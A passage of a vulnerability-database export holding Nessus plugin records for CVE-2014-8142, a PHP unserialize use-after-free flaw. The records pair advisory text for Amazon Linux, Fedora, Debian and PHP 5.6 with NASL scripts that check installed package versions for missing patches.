reference:\"php55-debuginfo-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-embedded-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xmlrpc-5.5.20-2.94.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:34", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .", "modified": "2018-04-18T00:00:00", "published": "2015-01-09T00:00:00", "id": "ALA_ALAS-2015-463.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80414", "title": "Amazon Linux AMI : php54 (ALAS-2015-463)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-463.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80414);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_xref(name:\"ALAS\", value:\"2015-463\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2015-463)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-463.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php54-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-ldap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.36-1.64.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.4. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.", "modified": "2018-07-24T00:00:00", "published": "2015-01-02T00:00:00", "id": "PHP_5_6_4.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80332", "title": "PHP 5.6.x < 5.6.4 'process_nested_data' RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80332);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n\n script_name(english:\"PHP 5.6.x < 5.6.4 'process_nested_data' RCE\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.4. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68594\");\n # https://bugzilla.redhat.com/show_bug.cgi?id=1175718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88c4ed71\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.6.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-3]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.4' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "18 Dec 2014, PHP 5.5.20\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68185 ('Inconsistent insteadof definition.'- incorrectly\ntriggered). (Julien)\\\\r\\\\n* Fixed bug #68370 ('unset($this)' can make\nthe program crash). (Laruence)\\\\r\\\\n* Fixed bug #68545 (NULL pointer\ndereference in unserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use\nafter free vulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n* Fixed\npossible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #66584 (Segmentation\nfault on statement deallocation) (Matteo)\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\\\\r\\\\n\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17229.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80290", "title": "Fedora 20 : php-5.5.20-2.fc20 (2014-17229)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17229.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80290);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17229\");\n\n script_name(english:\"Fedora 20 : php-5.5.20-2.fc20 (2014-17229)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.5.20\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68185 ('Inconsistent insteadof definition.'- incorrectly\ntriggered). (Julien)\\\\r\\\\n* Fixed bug #68370 ('unset($this)' can make\nthe program crash). (Laruence)\\\\r\\\\n* Fixed bug #68545 (NULL pointer\ndereference in unserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use\nafter free vulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n* Fixed\npossible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #66584 (Segmentation\nfault on statement deallocation) (Matteo)\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\\\\r\\\\n\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147163.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2110b79c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"php-5.5.20-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream\nversion 5.4.36, which includes additional bug fixes, new features and\npossibly incompatible changes. Please refer to the upstream changelog\nfor more information :\n\nTwo additional patches were applied on top of the imported new\nupstream version. An out-of-bounds read flaw was fixed which could\nlead php5-cgi to crash. Moreover a bug with php5-pgsql in combination\nwith PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-11-10T00:00:00", "published": "2015-01-02T00:00:00", "id": "DEBIAN_DSA-3117.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80308", "title": "Debian DSA-3117-1 : php5 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3117. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80308);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"DSA\", value:\"3117\");\n\n script_name(english:\"Debian DSA-3117-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream\nversion 5.4.36, which includes additional bug fixes, new features and\npossibly incompatible changes. Please refer to the upstream changelog\nfor more information :\n\nTwo additional patches were applied on top of the imported new\nupstream version. An out-of-bounds read flaw was fixed which could\nlead php5-cgi to crash. Moreover a bug with php5-pgsql in combination\nwith PostgreSQL 9.1 was fixed (Debian Bug #773182).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=773182\"\n );\n script_set_attribute(\n 